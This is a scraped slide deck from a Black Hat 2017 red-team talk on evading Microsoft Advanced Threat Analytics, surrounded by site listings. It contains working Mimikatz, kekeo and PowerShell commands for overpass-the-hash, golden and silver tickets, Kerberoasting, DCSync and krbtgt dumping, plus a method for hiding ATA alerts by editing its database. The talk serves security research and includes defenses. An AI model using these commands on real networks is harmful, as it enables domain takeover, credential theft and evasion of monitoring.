10 Tips for AIX Security by HelpSystems
10 Tips for AIX Security10 Tips for AIX Security
10 Tips for AIX Security
HelpSystems1.2K views
Заполучили права администратора домена? Игра еще не окончена by Positive Hack Days
Заполучили права администратора домена? Игра еще не оконченаЗаполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не окончена
Positive Hack Days475 views
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework by Leszek Mi?
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Leszek Mi?316 views

More from Nikhil Mittal

RACE - Minimal Rights and ACE for Active Directory Dominance by
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
47.7K views52 slides
Forging Trusts for Deception in Active Directory by
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
56.8K views36 slides
Hacked? Pray that the Attacker used PowerShell by
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
8.8K views43 slides
Workshop: PowerShell for Penetration Testers by
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersNikhil Mittal
1.2K views53 slides
Continuous intrusion: Why CI tools are an attacker’s best friends by
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsNikhil Mittal
1.8K views65 slides
Client side attacks using PowerShell by
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
7.7K views47 slides

More from Nikhil Mittal(12)

RACE - Minimal Rights and ACE for Active Directory Dominance by Nikhil Mittal
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
Nikhil Mittal47.7K views
Forging Trusts for Deception in Active Directory by Nikhil Mittal
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
Nikhil Mittal56.8K views
Hacked? Pray that the Attacker used PowerShell by Nikhil Mittal
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal8.8K views
Workshop: PowerShell for Penetration Testers by Nikhil Mittal
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
Nikhil Mittal1.2K views
Continuous intrusion: Why CI tools are an attacker’s best friends by Nikhil Mittal
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal1.8K views
Client side attacks using PowerShell by Nikhil Mittal
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
Nikhil Mittal7.7K views
Powerpreter: Post Exploitation like a Boss by Nikhil Mittal
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a Boss
Nikhil Mittal8.7K views
PowerShell for Penetration Testers by Nikhil Mittal
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
Nikhil Mittal36.2K views
Kautilya: Teensy beyond shell by Nikhil Mittal
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
Nikhil Mittal3K views
Teensy Programming for Everyone by Nikhil Mittal
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
Nikhil Mittal3.8K views
More fun using Kautilya by Nikhil Mittal
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
Nikhil Mittal2.5K views
Owning windows 8 with human interface devices by Nikhil Mittal
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
Nikhil Mittal2.2K views

Recently uploaded

VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue by
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlueVNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlueShapeBlue
207 views54 slides
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue by
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlueWhat’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlueShapeBlue
265 views23 slides
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti... by
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...ShapeBlue
141 views29 slides
Transcript: Redefining the book supply chain: A glimpse into the future - Tec... by
Transcript: Redefining the book supply chain: A glimpse into the future - Tec...Transcript: Redefining the book supply chain: A glimpse into the future - Tec...
Transcript: Redefining the book supply chain: A glimpse into the future - Tec...BookNet Canada
41 views16 slides
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlue by
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlueCloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlue
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlueShapeBlue
137 views13 slides
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlue by
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlueElevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlue
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlueShapeBlue
224 views7 slides

Recently uploaded(20)

VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue by ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlueVNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
ShapeBlue207 views
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue by ShapeBlue
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlueWhat’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue
ShapeBlue265 views
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti... by ShapeBlue
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
ShapeBlue141 views
Transcript: Redefining the book supply chain: A glimpse into the future - Tec... by BookNet Canada
Transcript: Redefining the book supply chain: A glimpse into the future - Tec...Transcript: Redefining the book supply chain: A glimpse into the future - Tec...
Transcript: Redefining the book supply chain: A glimpse into the future - Tec...
BookNet Canada41 views
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlue by ShapeBlue
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlueCloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlue
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlue
ShapeBlue137 views
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlue by ShapeBlue
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlueElevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlue
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlue
ShapeBlue224 views
The Power of Generative AI in Accelerating No Code Adoption.pdf by Saeed Al Dhaheri
The Power of Generative AI in Accelerating No Code Adoption.pdfThe Power of Generative AI in Accelerating No Code Adoption.pdf
The Power of Generative AI in Accelerating No Code Adoption.pdf
Saeed Al Dhaheri39 views
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online by ShapeBlue
KVM Security Groups Under the Hood - Wido den Hollander - Your.OnlineKVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online
ShapeBlue225 views
Business Analyst Series 2023 - Week 4 Session 8 by DianaGray10
Business Analyst Series 2023 -  Week 4 Session 8Business Analyst Series 2023 -  Week 4 Session 8
Business Analyst Series 2023 - Week 4 Session 8
DianaGray10145 views
The Role of Patterns in the Era of Large Language Models by Yunyao Li
The Role of Patterns in the Era of Large Language ModelsThe Role of Patterns in the Era of Large Language Models
The Role of Patterns in the Era of Large Language Models
Yunyao Li91 views
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ... by ShapeBlue
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...
Live Demo Showcase: Unveiling Dell PowerFlex’s IaaS Capabilities with Apache ...
ShapeBlue129 views
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ... by Jasper Oosterveld
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...
Webinar : Desperately Seeking Transformation - Part 2: Insights from leading... by The Digital Insurer
Webinar : Desperately Seeking Transformation - Part 2:  Insights from leading...Webinar : Desperately Seeking Transformation - Part 2:  Insights from leading...
Webinar : Desperately Seeking Transformation - Part 2: Insights from leading...
"Node.js Development in 2024: trends and tools", Nikita Galkin by Fwdays
"Node.js Development in 2024: trends and tools", Nikita Galkin "Node.js Development in 2024: trends and tools", Nikita Galkin
"Node.js Development in 2024: trends and tools", Nikita Galkin
Fwdays33 views
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R... by ShapeBlue
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
ShapeBlue178 views
Digital Personal Data Protection (DPDP) Practical Approach For CISOs by Priyanka Aash
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Priyanka Aash162 views

Evading Microsoft ATA for Active Directory Domination

  • 1. Evading Microsoft ATA for Active Directory Domination Nikhil Mittal
  • 2. About me • Hacker, Red Teamer, Trainer, Speaker at http://pentesteracademy.com/ • Twitter - @nikhil_mitt • Blog – http://labofapenetrationtester.com • Github - https://github.com/samratashok/ • Creator of Kautilya and Nishang • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous Talks and/or Trainings – DefCon, BlackHat, CanSecWest, BruCON, DeepSec and more. Evading ATA by Nikhil Mittal 2BlackHat USA 2017
  • 3. Contents • Introduction • Architecture • Lab Configuration • Detections • Evasion and Bypass • Complete attack path/kill chain from normal domain user to DA • Conclusion BlackHat USA 2017 3Evading ATA by Nikhil Mittal
  • 4. What is Microsoft ATA? • “Advanced Threat Analytics (ATA) is an on- premises platform that helps protect your enterprise from multiple types of advanced targeted cyber attacks and insider threats.” https://docs.microsoft.com/en-us/advanced-threat-analytics/understand- explore/what-is-ata • ATA detects attacks by reading certain “interesting” protocols’ traffic to the domain controller(s), SIEM events and logs. • Anomaly based and behavior based detection. BlackHat USA 2017 4Evading ATA by Nikhil Mittal
  • 5. ATA Architecture BlackHat USA 2017 5Evading ATA by Nikhil Mittal
  • 6. Lab Configuration • Lab used for experiments contains a Lightweight ATA gateway installed over a Server 2012 R2 Domain Controller with students and professionals (400+) trying various Active Directory attacks from various machines. • ATA 1.7 and 1.8 with the default configuration have been installed and used as documented here. https://docs.microsoft.com/en-us/advanced- threat-analytics/deploy-use/install-ata-step1 BlackHat USA 2017 6Evading ATA by Nikhil Mittal
  • 7. Detections – Threats of interest which ATA detects • Recon – Account Enumeration – Session Enumeration – AD Enumeration • Compromised Credentials – Brute Force – Unusual protocol implementation – Abnormal Behavior • Lateral Movement – Pass the ticket – Pass the hash – Overpass-the-hash – Abnormal behavior • Domain Dominance – Golden Ticket – Malicious replication requests https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-threats BlackHat USA 2017 7Evading ATA by Nikhil Mittal
  • 8. Evading ATA - Recon- Detection • ATA detects AD based recon by looking for queries sent to the DC. • But, ATA doesn’t mind DC giving out useful information unless invasive recon is done against the DC! BlackHat USA 2017 Evading ATA by Nikhil Mittal 8
  • 9. Evading ATA – Recon - Bypass • Intelligent Recon is not caught by ATA. • Not poking the DC is the key! Enumerate the domain but do not enumerate the DC. For example, while hunting for DA tokens, get a list of computers and DAs from the DC but do not run enumeration tools against the DC. • Same holds true for other user hunting activities like enumerating local admins, looking for local admin access etc. BlackHat USA 2017 Evading ATA by Nikhil Mittal 9
  • 10. Evading ATA – Recon - Bypass Hunting for Domain Admin token • Avoid searching for DA token on the DC. Local admin privileges are required to use the token. • To hunt for those machines where a DA token is available, we can enumerate Domain Admins from the DC, get a list of machines using ping sweep or asking from DC and then run Invoke- UserHunter (PowerView) on all machines except the DC. BlackHat USA 2017 Evading ATA by Nikhil Mittal 10
  • 11. Evading ATA - Recon • SPN (Service Principal Name) Scanning doesn’t get detected. • SPN is used by Kerberos to associate a service instance with a service logon account. https://msdn.microsoft.com/en- us/library/windows/desktop/ms677949%28v%3Dvs.85%29.aspx • Tools like PowerView can be used for SPN scanning. BlackHat USA 2017 11Evading ATA by Nikhil Mittal
  • 12. Evading ATA – Recon - Demo BlackHat USA 2017 Evading ATA by Nikhil Mittal 12
  • 13. Evading ATA – Brute Force • A Brute force attack which tries single password for multiple users doesn’t get detected – which is a well known technique for brute-forcing AD users. http://www.labofapenetrationtester.com/2015/04/pi llage-the-village-powershell-version.html BlackHat USA 2017 13Evading ATA by Nikhil Mittal
  • 14. Evading ATA - Overpass-the-hash • Overpass-The-Hash allows to create Kerberos tickets from NTLM hashes/AES keys. • This allows access to resources which need Kerberos authentication with “just” a hash. • Explained by Benjamin here: http://blog.gentilkiwi.com/securite/mimikatz/ overpass-the-hash BlackHat USA 2017 14Evading ATA by Nikhil Mittal
  • 15. Evading ATA - Overpass-the-hash - Detection • This is what a normal AS-REQ packet looks like. Note the encryption type for timestamp. BlackHat USA 2017 15Evading ATA by Nikhil Mittal
  • 16. Evading ATA - Overpass-the-hash - Detection • This is what an AS- REQ packet looks like when using NTLM hashes for Over-PTH. Note that the encryption type used by timestamp is downgraded. Invoke-Mimikatz –Command ‘”sekurlsa::pth /user:privservi ce /domain:offensi veps.com /ntlm:ntlmhash” ’ BlackHat USA 2017 16Evading ATA by Nikhil Mittal
  • 17. Evading ATA - Overpass-the-hash - Detection • ATA looks for anomalies like the one discussed. • There are two detections for Over-PTH – One is “Encryption downgrade activity” for which ATA even conveniently tells the reason for detection. BlackHat USA 2017 17Evading ATA by Nikhil Mittal
  • 18. Evading ATA - Overpass-the-hash - Detection • There are two detections for Over-PTH – Second is “Unusual protocol implementation” for which I _believe_ ATA looks for supported encryption types as well. If not now, in future? Normal NTLM AES BlackHat USA 2017 18Evading ATA by Nikhil Mittal
  • 19. Evading ATA - Overpass-the-hash - Bypass • So, to bypass this detection, all we need to do is to make the encryption type same as the one used normally. • The following mimikatz command can be used for that: Invoke-Mimikatz -Command '"sekurlsa::pth /user:privservice /domain:offensiveps.com /aes256:aes256 /ntlm:ntlm /aes128:aes128"‘ • I have noted that putting all AES256, AES128 and NTLM(RC4) together reduces chances of detection. • “AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with KB2871997, in this case you can avoid NTLM hash.” - https://github.com/gentilkiwi/mimikatz/wiki/module-~- sekurlsaBlackHat USA 2017 19Evading ATA by Nikhil Mittal
  • 20. BlackHat USA 2017 20Evading ATA by Nikhil Mittal
  • 21. Evading ATA - Overpass-the-hash – False events/detections • Interestingly, the “Unusual protocol implementation” detection for Overpass-the-hash identifies the user with the username (/user option) used in created ticket. • This means, we can create failure events for any user in the domain (even honey token users of ATA) which could be useful for generating false detections. BlackHat USA 2017 21Evading ATA by Nikhil Mittal
  • 22. Evading ATA - Golden Ticket • We can now use Over-PTH to create tickets of DA without detection. The next step is to create a Golden ticket for domain dominance. • Since Golden ticket is a valid TGT, the action now is for the TGS-REQ packet. • Krbtgt hash is required for creating a Golden ticket. • Golden Ticket: https://www.blackhat.com/docs/us- 14/materials/us-14-Duckwall-Abusing-Microsoft- Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf BlackHat USA 2017 22Evading ATA by Nikhil Mittal
  • 23. Evading ATA - Golden Ticket - Detection • This is what a normal TGS-REQ packet looks like. Note the encryption type used for the ticket. BlackHat USA 2017 23Evading ATA by Nikhil Mittal
  • 24. Evading ATA - Golden Ticket - Detection • TGS-REQ packet for a Golden Ticket generated using NTLM hash. Note the encryption type has been downgraded. Invoke-Mimikatz -Command '"kerberos::golden /User:privservice /domain:offensiveps.com /sid:S-1-5-21-3270384115-3177237293-604223748 /krbtgt:ntlmhash /id:500 /groups:513 /ptt"' BlackHat USA 2017 24Evading ATA by Nikhil Mittal
  • 25. Evading ATA - Golden Ticket - Detection • Once again, ATA looks for anomalies like the encryption type downgrade. • The detection for Golden ticket is: – “Encryption downgrade activity” for which ATA informs us that the “encryption method of the TGT field of TGS_REQ message has been downgraded”. BlackHat USA 2017 25Evading ATA by Nikhil Mittal
  • 26. Evading ATA - Golden Ticket - Bypass • Once again, to bypass this detection, all we need to do is to make the encryption type same as the one used normally :) • The following mimikatz command can be used for that: Invoke-Mimikatz -Command '"kerberos::golden /User:privservice /domain:offensiveps.com /sid:S- 1-5-21-3270384115-3177237293-604223748 /aes256:aes256keysofkrbtgt /id:500 /groups:513 /ptt"‘ • A Golden ticket using AES keys can be generated from any machine unlike restrictions in case of Over-PTH. BlackHat USA 2017 26Evading ATA by Nikhil Mittal
  • 27. BlackHat USA 2017 27Evading ATA by Nikhil Mittal
  • 28. Evading ATA - Golden Ticket - Bypass • Also, to my surprise, creating a Golden ticket for a non- existent username doesn’t get detected even with NTLM hash!! – No need of running DCSync for AES keys! • The following mimikatz command can be used for that: Invoke-Mimikatz -Command '"kerberos::golden /User:nonexistent /domain:offensiveps.com /sid:S- 1-5-21-3270384115-3177237293-604223748 /ntlm:ntlmhashofkrbtgt /id:500 /groups:513 /ptt"‘ • May be because ATA has no such identity in its database, it can’t detect the action. • I hope this is a mis-configuration in my labs. No it is not a mis-config :/ BlackHat USA 2017 28Evading ATA by Nikhil Mittal
  • 29. Evading ATA 1.8 - Golden Ticket - Bypass • ATA 1.8 introduces ticket lifetime based detection for Golden tickets. “If a Kerberos ticket is used for more than the allowed lifetime, ATA will detect it as a suspicious activity”. • While this definitely blunts the attack there are still couple of ways around it. • First, Keep the krbtgt hash handy and create a Golden ticket whenever required –easy and simple. Keep in mind that it is the krbtgt hash which provides persistence, not the Golden ticket. BlackHat USA 2017 29Evading ATA by Nikhil Mittal
  • 30. Evading ATA 1.8 - Golden Ticket - Bypass • Second, while creating a Golden ticket keep in mind the lifetime of the ticket. Create a ticket which is valid from a future date with ticket lifetime within domain settings (default is 10 hours). • The below ticket is valid for one hour after two hours from the time of creation: Invoke-Mimikatz -Command '"kerberos::golden /User:privservice /domain:offensiveps.com /sid:S- 1-5-21-3270384115-3177237293-604223748 /aes256: /id:500 /groups:513 /startoffset:120 /endin:60 /renewmax:100800 /ticket:golden.kirbi"‘ • Make sure you purge the tickets from memory once the activity is over.BlackHat USA 2017 30Evading ATA by Nikhil Mittal
  • 31. Evading ATA – Constrained Delegation • Constrained delegation attack – the ability to access a service by impersonating *any* user if the service account is configured for it- doesn’t get detected even if services on the DC are accessed. • More about the attack: https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/ http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ https://www.coresecurity.com/blog/kerberos-delegation-spns-and-more BlackHat USA 2017 31Evading ATA by Nikhil Mittal
  • 32. Evading ATA – Constrained Delegation • When the initial request is sent to request a TGT (AS-REQ), this is how it looks like (service accounts support only RC4 encryption) .asktgt.exe /user:ops-mssql$ /domain:offensiveps.com /key:ntlmhash /ticket:opsmssql.kirbi BlackHat USA 2017 32Evading ATA by Nikhil Mittal
  • 33. Evading ATA – Constrained Delegation • In the subsequent exchanges (for requesting TGS and accessing the service) the encryption type is normal so no detection here as well. • Even a code execution by accessing HOST and RPCSS for WMI doesn’t get detected. • I believe ATA cannot detect this attack because it, right now, lacks the ability or signature for the attack. • Please note that if actions like DCSync are used by accessing ldap service using this attack, there would be a detection in ATA for “Malicious replication of directory services”. BlackHat USA 2017 33Evading ATA by Nikhil Mittal
  • 34. Evading ATA – Attacks across trusts • Most attacks across trusts are not detected. • While there are so many scenarios, I checked couple of more interesting ones: – Escalate from child domain admin to forest enterprise admin. – DCSync/Replication using inter-realm TGT and executed from the child DC doesn’t get detected. https://adsecurity.org/?p=1588 BlackHat USA 2017 34Evading ATA by Nikhil Mittal
  • 35. Evading ATA – Attacks across trusts Escalation from child to forest root • A valid TGT is created using NTLM/RC4 hash of krbtgt for the child domain (along with some other information). • The encryption type for both the child and parent domain from the source machine is by-default ARCFOUR-HMAC-MD5 so chances of detection are low :) • ATA does detect Overpass-the-hash (AS-REQ) with downgraded encryption type. BlackHat USA 2017 35Evading ATA by Nikhil Mittal
  • 36. Evading ATA – Attacks across trusts DCSync/Replication doesn’t get detected. • A replication done across trust – from child to root – when done from child DC, doesn’t get detected which makes sense as DCs requesting replication is normal. • This just makes the escalation to EA of forest from a child DA much sweeter ;) BlackHat USA 2017 36Evading ATA by Nikhil Mittal
  • 37. Evading ATA – Plaintext passwords • Using passwords avoid many anomaly based attacks. Depending on the target OS, palintext passwords can be found in : – Wdigest – LSA Secrets – Log on passwords – Unattended deployment files – File servers BlackHat USA 2017 37Evading ATA by Nikhil Mittal
  • 38. Avoiding ATA • If you can’t bypass it, avoid it :) • There are attacks which can be used to avoid ATA by having no or minimal conversation with the DC. • Such attacks may not cover the complete attack chain but will still come handy in an actual assessment. BlackHat USA 2017 38Evading ATA by Nikhil Mittal
  • 39. Avoiding ATA – Silver Ticket • Silver ticket attacks cannot be detected by ATA as there is no communication with the DC (it is a valid TGS). Invoke-Mimikatz -Command '"kerberos::golden /User:sqladmin /domain:offensiveps.com /sid:S-1-5-21-3270384115-3177237293-604223748 /target:ops-mssql.offensiveps.com /service:MSSQLSvc /rc4:b /id:500 /ptt"‘ • More about Silver Tickets: https://digital-forensics.sans.org/blog/2014/11/24/kerberos- in-the-crosshairs-golden-tickets-silver-tickets-mitm-more BlackHat USA 2017 39Evading ATA by Nikhil Mittal
  • 40. Avoiding ATA – Silver Ticket BlackHat USA 2017 40Evading ATA by Nikhil Mittal
  • 41. Avoiding ATA – Kerberoast • Kerberoast attack is not detected by ATA as there is minimal and normal communication with the DC. • Just need to request a TGS (TGS-REQ and TGS-REP) Add-Type -AssemblyNAme System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecur ityToken -ArgumentList “MSSQLSvc/OPS- file.offensiveps.com:SQLEXPRESS • Kerberoast: https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Do g%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20- %20Tim%20Medin(1).pdf BlackHat USA 2017 41Evading ATA by Nikhil Mittal
  • 42. Avoiding ATA – Kerberoast BlackHat USA 2017 42Evading ATA by Nikhil Mittal
  • 43. Avoiding ATA – Kerberoast variants • Variants of Kerberoast are also not detected for the same reason – normal interaction with DC. – Request AS-REP from DC for the accounts which do not require Pre-Auth and brute-force it offline. – With enough privileges, force-set SPN for a user, request a TGS for the SPN and brute-force it offline. – With enough privileges, force disable Pre-Auth for a user. http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks- weaponizing-kerberos-protocol-flaws http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ BlackHat USA 2017 43Evading ATA by Nikhil Mittal
  • 44. Avoiding ATA – SQL Server • Targeting SQL servers allows avoiding interaction with DC and thus, ATA. – Brute-Force SQL server logins. – Use linked DBs to move. – Never leave the Database layer. It may also be one of the places where we can achieve goal of an assessment (access to IP, PII, Employee data etc.) BlackHat USA 2017 44Evading ATA by Nikhil Mittal
  • 45. BlackHat USA 2017 Evading ATA by Nikhil Mittal 45
  • 46. Avoiding ATA – Attack Chain 1 • Started as a normal domain user – DA is the goal – SPN Scanning for SQL Servers. – Gain access to a SQL Server • Look for database connection strings; • Exploit SQL injection; • Brute force a SQL server with sa or other SQL Server login – Move around in the database layer using linked databases. – Identify a SQL server service running with DA – Achieve command execution on the SQL server with DA privileges (if DA privilege was the goal) http://www.labofapenetrationtester.com/2017/03/using- sql-server-for-attacking-forest-trust.html BlackHat USA 2017 46Evading ATA by Nikhil Mittal
  • 47. Avoiding ATA – Attack Chain 2 • Started as a normal domain user – DA is the goal – Enumerate accounts (users and machines) with constrained delegation enabled. – Looks for access to service running under a machine account. – Access services like HOST and RPCSS etc. to achieve command execution on DC. – Further lateral movement using Overpass-the-hash with AES keys and/or pull krbtgt hash and target the forest root. BlackHat USA 2017 47Evading ATA by Nikhil Mittal
  • 48. ATA - Limitations • Encrypted traffic (like LDAPS and IPSEC ESP) is not analyzed but may not affect detection https://github.com/MicrosoftDocs/ATADocs/blob/ master/ATADocs/ata-technical-faq.md#does-ata- work-with-encrypted-traffic • Communication outside protocols monitored by ATA https://docs.microsoft.com/en-us/advanced- threat-analytics/ata-prerequisites BlackHat USA 2017 48Evading ATA by Nikhil Mittal
  • 49. ATA - Limitations • Must have signatures for attack types. – We saw example of Constrained Delegation. – Another very interesting attack which ATA can’t detect because it does not know the attack is loading an arbitrary dll using DNS service – elevation to DA from DNSAdmins membership if DC is also the DNS server. https://medium.com/@esnesenon/feature-not-bug- dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 http://www.labofapenetrationtester.com/2017/05/abusing -dnsadmins-privilege-for-escalation-in-active- directory.html BlackHat USA 2017 49Evading ATA by Nikhil Mittal
  • 50. Attacking ATA deployment • ATA Console can be identified with basic banner grabbing. • ATA, interestingly, seems to subscribe to the concept of “if its admin its game over”. All users/groups added to the local administrators group of ATA Centre have admin access to the console by default! https://blogs.technet.microsoft.com/enterprisemobility/2016 /06/10/best-practices-for-securing-advanced-threat- analytics/ BlackHat USA 2017 50Evading ATA by Nikhil Mittal
  • 51. Attacking ATA deployment • The backend MongoDB listens only on localhost but needs no authentication :) • With administrative access on the ATA Center, the backend MongoDB can be accessed. • Interesting collections like Unique identities for users and machines, Suspicious activities, Kerberos traffic and many more. BlackHat USA 2017 51Evading ATA by Nikhil Mittal
  • 52. Attacking ATA deployment • It is possible to tamper with alerts using access to this database. No alerts are generated if the database is tampered. BlackHat USA 2017 52Evading ATA by Nikhil Mittal
  • 53. Attacking ATA deployment • It is also possible (and easier) to set the visibility of alerts to false by setting the “IsVisible” property of any entry in the SuspiciousActivity collection in the ATA database. BlackHat USA 2017 53Evading ATA by Nikhil Mittal
  • 54. Defenses against the Evasions • ATA even if can’t detect anomalies, provides interesting insight in the traffic exchanged with the Domain Controller. Use that to detect the attackers. • Limit your DAs to login only to Domain Controllers. Remember prevention is better than cure. • Implement possible architectural changes suggested here: https://technet.microsoft.com/en-us/windows- server-docs/security/securing-privileged- access/securing-privileged-access BlackHat USA 2017 54Evading ATA by Nikhil Mittal
  • 55. Evading ATA - Forever • Avoid the temptation of escalating to Domain Admin privileges without understanding the active directory environment and possible defenses in place. • Reduce communication to the DC. Go slow and careful in the lateral movement phase. Don’t create a Golden Ticket or launch a Skeleton Key just to brag about it in your report. • Stay focused on the goal of the assessment. If you can’t bypass it, avoid it! BlackHat USA 2017 55Evading ATA by Nikhil Mittal
  • 56. Limitations • Focus of all the bypasses is on Anomaly based detections. • Many behavior based detections could not be replicated in the lab and are more powerful and useful in a real environment. • Behavior based detection may detect lateral movement even if the anomaly based detection is bypassed – use the avoidance techniques in such cases. BlackHat USA 2017 Evading ATA by Nikhil Mittal 56
  • 57. The ATA Team • Thanks to the ATA Team. You guys are awesome! It was a pleasure working with you. BlackHat USA 2017 Evading ATA by Nikhil Mittal 57
  • 58. Black Hat Sound Bytes • It is possible to bypass detections by ATA by modifying well known attacks so that they appear normal. • Modification of attack methodologies and avoiding talking to DC is also effective. • Despite its limitations, ATA provides effective visibility and detection for AD attacks. BlackHat USA 2017 58Evading ATA by Nikhil Mittal
  • 59. Thank you • Please leave feedback. • Follow me @nikhil_mitt • For questions, training, assessments - nikhil.uitrgpv@gmail.com nikhil@pentesteracademy.com • Slides and blog posts on ATA will be posted on my blog and Github http://labofapenetrationtester.com/ https://github.com/samratashok BlackHat USA 2017 Evading ATA by Nikhil Mittal 59

Editor's Notes

  1. Invoke-Mimikatz -Command '"lsadump::lsa /name:krbtgt /inject"' -ComputerName ops-dc
  2. kekeo # tgs::s4u /tgt:opsmssql.kirbi /user:Administrator@offensiveps.com /service:time/ops-dc.offensiveps.com|ldap/ops-dc.offensiveps.com Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@offensiveps.com@OFFENSIVEPS.COM_ldap~ops-dc.offensiveps.com@OFFENSIVEPS.COM_ALT.kirbi"‘ Invoke-Mimikatz -Command '"lsadump::dcsync /user:opsdc\krbtgt"'
